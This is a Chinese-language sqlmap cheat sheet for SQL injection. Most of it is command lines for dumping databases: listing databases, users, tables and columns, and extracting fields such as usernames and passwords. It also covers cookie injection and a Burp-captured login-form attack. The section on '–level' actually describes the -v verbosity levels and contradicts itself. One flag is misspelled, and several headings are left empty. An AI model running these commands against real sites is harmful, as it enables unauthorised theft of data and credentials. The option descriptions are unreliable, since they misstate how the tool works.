1.sqlmap支持的注入模式
sqlmap支持五種不同的注入模式:
1、基於布爾的盲注: 即可以根據返回頁面判斷條件真假的注入。
2、基於時間的盲注: 即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
3、基於報錯注入: 即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。
4、聯合查詢注入: 可以使用union的情況下的注入。
5、堆查詢注入: 可以同時執行多條語句的執行時的注入。
2.sqlmap支持注入的數據庫
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
3.注入的一個流程
給sqlmap一個url的時候,它會:
1、判斷可注入的參數
2、判斷可以用那種SQL注入技術來注入
3、識別出哪種數據庫
4、根據用戶選擇,讀取哪些數據
url可以提供一個簡單的URL,Burp或WebScarab請求日誌文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。
還可以設定HTTP(S)請求的併發數,來提高盲注時的效率。
4.sqlmap運行的級別–level
sqlmap中共有七個等級,默認等級爲1
0、只顯示Python錯誤以及嚴重的信息。
1、同時顯示基本信息和警告信息。(默認)
2、同時顯示debug信息。
3、同時顯示注入的payload。
4、同時顯示HTTP請求。
5、同時顯示HTTP響應頭。
6、同時顯示HTTP響應頁面。
等級是指測試結果的輸出的詳細程度,根據測試,–level等級的提高得到的效果遠比-v等級提高得到的效果好,如果你想看到sqlmap發送的測試payload最好的等級就是3。
5.對各種注入的一些基本步驟
1.sqlmap注入拖庫常用命令
- sqlmap.py -u “注入地址” -v 1 –dbs // 列舉數據庫
- sqlmap.py -u “注入地址” -v 1 –current-db // 當前數據庫
- sqlmap.py -u “注入地址” -v 1 –users // 列數據庫用戶
- sqlmap.py -u “注入地址” -v 1 –current-user // 當前用戶
- sqlmap.py -u “注入地址” -v 1 –tables -D “數據庫” // 列舉數據庫的表名
- sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “數據庫” // 獲取表的列名
- sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “數據庫” // 獲取表中的數據,包含列
2.access注入
3.mysql注入
- url –current-db當前庫
- url –current-user當前用戶
- url –dbs 獲得數據庫
- url -D 數據庫 –tables 獲得表
- url -D 數據庫 -T 表名 –columns 暴字段
- url -D 數據庫 -T 表名 -C 字段 –dump 暴內容
4.cookie注入
- url –cookie ”id=” –table –level 2 暴表
- url –cookie ”id=” –columns -T 表名 –level 2 獲得字段
- url –cookie ”id=“ –dump -T 表名 -C ”字段名” –level 2 獲得內容
5.POST登陸框注入
注入點:
http://xxx.xxx.com/Login.asp
注入方式一:
1.對着注入點使用burp抓包,保存txt格式文件。
2.輸入命令:sqlmap.py -r search-test.txt -p tfUPass
注入方式二:自動搜索表單的方式
注入方式三:指定一個參數的方法
6.cookie注入
單個注入
- sqlmap -u “http://www.xxx.com/index.php” –cookie “id=1″ –dbs –level 2
- sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –clumns -T 表段 –level 2
- sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2
7.僞靜態注入
目標站點:http://www.xxxx.com/id/3-1.html
8.請求延時注入